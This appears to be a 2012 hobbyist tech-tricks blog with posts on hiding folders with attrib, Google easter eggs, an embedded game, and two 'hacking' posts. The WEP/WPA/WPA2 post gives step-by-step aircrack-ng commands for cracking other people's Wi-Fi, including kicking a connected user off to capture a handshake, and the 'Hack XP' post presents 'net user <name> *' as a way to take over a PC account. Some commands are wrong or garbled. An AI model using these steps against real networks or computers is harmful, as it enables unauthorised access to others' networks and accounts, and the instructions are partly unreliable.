Join us on Facebook

Thursday 20 December 2012

HOw to Hide a Folder

Awesome Folder Hiding Trick
For Windows
Now I will teach U a best and
the most premium way to
hide your personal stuff from
the unknown or strangers eyes.
The one simplest way
everybody uses is just going to
tools>folder
options>view>then selecting
hide folder and that’s it
but I
will tell you the best way in
which if a unknown person
selects view hidden files than
also it will be not visible to
anyone.



This trick is very cool and most
of the people don't know this
trick. So it will be always better
to use this trick to hide your
folders instead of using the
windows default folder options
trick.

How to Hide Folder :
1. First create the folder in the
drive you want to hide.

example : Creating ABC folder in
D: drive

2. Now you have all the stuff
which U want to hide from the
people in ABC folder which is in
D: drive

3. Now go to RUN by hitting
Windows key + R

4. Type attrib +s +h D:/ABC

5. The above one is the
command for hiding the folder,
in above command D is the
drive name and ABC is the folder
name as I mentioned above.

6. Now simply hit Enter to Hide
and vanish away ABC folder and
become safe from the
unattended stranger.
How to Unhide Folder :
1. Now you had learned to hide
your folder in a premium way
well ya you can test it by going
to tools/folder option/show
hidden files, it will still not show
and its totally hidden.

2. Now to unhide it what you
need to do is too simply reverse
the RUN Command which you
previously gave to hide your
folder.

3. Now again open RUN and
reverse the command attrib –s –
h D:/ABC

4. That’s it now you had reveled
your personal files so hide them
again or I will see them :)

Wednesday 19 December 2012

Games

<embed width="640" height="480" base="http://external.kongregate-games.com/gamez/0015/8640/live/" src="http://external.kongregate-games.com/gamez/0015/8640/live/embeddable_158640.swf" type="application/x-shockwave-flash"></embed><br/>Play free games at <a href="http://www.kongregate.com/">Kongregate</a>

Sunday 16 December 2012

Google Tricks

Today's Fun
"Google- I'm Felling Lucky"

1. Type “let it snow” and click on I’m Feeling Lucky. (awesome snow effect)

2. Type “google gravity” and click on I’m Feeling Lucky. (things start falling down)

3. Type “elggog” and click on I’m Feeling Lucky. (amazing mirror effect)

4. Type “do a barrel roll” and click on I’m Feeling Lucky. (a nice barrel roll attempted)

5. Type “who’s awesome” and click on I’m Feeling Lucky.



6. Type “tilt” and click on I’m Feeling Lucky. (webpage in 3D)

7. Type “who is the cutest” and click on I’m Feeling Lucky. (cute reviewed)

8. Type “google loco” and click on I’m Feeling Lucky. (someone starts moving)

9. Type “lol limewire” and click on I’m Feeling Lucky. (awesome picture)

10. Type “epic google” and click on I’m Feeling Lucky.

11. Type “rainbow google” and click on I’m Feeling Lucky.

12. Type “annoying google” and click on I’m Feeling Lucky.

13. Type “google pacman” and click on I’m Feeling Lucky.

14. Type “google heart page” and click on I’m Feeling Lucky.

15. Type “google magic” and click on I’m Feeling Lucky.

16. Type “google (color name)” and click on I’m Feeling Lucky.

17. Type “epic box” and click on I’m Feeling Lucky.

18. Type “sexy snape” and click on I’m Feeling Lucky.

19. Type “google sphere” and click on I’m Feeling Lucky.

20. Type “weenie google” and click on I’m Feeling Lucky.

Saturday 15 December 2012

Cracking WEP,WPA,WPA1 Wifi Networks By using aircracks png

Cracking WEP, WPA and WPA2 Encrypted Wifi Networks using Aircrack-ng.
In this tutorial I will demonstrate you how to crack almost any Encrypted Network that uses WEP, WPA and WPA2.

1. Before we start. 
What we need:
Linux:
sudo apt-get install aircrack-ng airmon-ng airodump-ng aireplay-ng kismet
(Recommended Download for Linux Users – It auto configures the tools needed)
Backtrack:
NOTHING! Every is included by default in backtrack….


2. WEP Cracking.
WEP is very easy and fast to crack. Here are the steps:
1. Put your Wireless Interface into Monitor Mode:
airmon-ng start wlan0
(In this example our interface is ‘wlan0′ – To find out your wireless interface type: iwconfig scan or airmon-ng )

2. Get Info from the Available Networks:
airodump-ng mon0
(mon0 is the monitored wlan0 interface)

3. Select one network that uses WEP encryption. In our Example the network is named SKIDHACKER. Now, get more info on the specific Network:
airodump-ng -c channel -w filetosave –bssid macaddrs mon0
(‘channel’ is the Channel Number) (‘filetosave’ is the file that airodump-ng will save its data) (‘macaddrs’ is the MAC Address of the Network) —> All this info is provided by the command used in Step 2.

4. To boost the proccedure type on a new terminal:
aireplay-ng -1 0 -a bssid mon0
(‘bssid’ is the MAC Address of the Network)

5. When this command is done, capture packets by typing:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b bssid mon0
(‘bssid’ is the Networks MAC Address)

6. When the above command gets about 20.000 – 30.000 packets you are now able to crack the network by typing:
aircrack-ng filename.cap
(where instead of ‘filename’.cap you enter the file that aireplay-ng saved at your current directory – This file is named wep-x.cap –x is a number, starting from ’01′, then ’02′ etc….–) (Instead of the ‘wep-01.cap’ you can use the ‘wep*.cap’ as in the example to ‘Auto-Select’ the file)

7. When aircrack-ng finds the key it will display something like:
KEY FOUND! [ 12:34:56:78:90 ]
(In this example our key is ’1234567890′)
8. When Finished, make sure you put your wireless interface back to original Mode by typing:
airmon-ng stop wlan0
_____________________________________________________

3. WPA – WPA2 Cracking

How it is Cracked:
WPA-WPA2 are a special case when it comes to Wireless Network Cracking. The method used to crack them is named ‘Handshake’. What should we do to get the Handshake is fooling a Computer connected to the network we will crack. Then we will use a dictionary to crack the Handshake and get the Key. So, this means that to crack these networks we need:
A huge dictionary / wordlist – The bigger, the Better. (You can find searching the web using terms like: ‘Large WPA-WPA2 Cracking Wordlist’)
A PC already connected to that network.
So, let’s go and crack that network:
1. Enter your wireless interface into monitor mode:
airmon-ng start wlan0
(List your interfaces by typing airmon-ng or iwlist scan)

2. Get the list of the networks available:
airodump-ng mon0
(‘mon0′ is the monitored interface)

3. Get info on a specific Network:
airodump-ng -c channel -w filename –bssid macaddrs mon0
(‘channel’ is the Network’s channel number) (‘filename’ is the name of the file that airodump-ng will save its data) (‘macaddrs’ is the Network’s MAC Address)

4. Note that under the STATION Tab there is a MAC address. This means that there is someone connected to that network and this is his PC’s MAC address. To get the handshake we will kick him off and he will automatically reconnect to the network.
So, to kick him of and get the handshake, type at a new terminal:
aireplay-ng -1 0 -a bssid mon0
(where ‘bssid’ you must type the Network‘s MAC Address)

5. When we successfully get the handshake, stop the proccess by hitting CTRL+C at the terminal that Airodump-ng is running. The handshake should be placed at your Home Folder.

To crack it type:
aircrack-ng -w dictionary /username/filename
(‘dictionary’ is the name/path of your dictionary) (‘username’ is your username – on Backtrack is ‘root’ by default) (‘filename’ is the captured WPA/WPA2 Handshake)

Saturday 8 December 2012

Hack XP

How to hack pasword for win xp through 'CMD' >>

1. Go to 'run' and type 'cmd'
2. enter d program
3. a screen vl appear, 
4. then type exactly lyk ds 'net user'
5. then d pc user domain name vl appear, . remember d user name of d pc
6.  then  exactly type lyk ds 'net user <user name of d pc> *'
7. pasword hacked
8. then  go to control panel nd type ur own pasword 9. dis trik is effectv, it doesnt fail,

© 2013 Noobs-Acadmy. All rights resevered. Designed by Templateism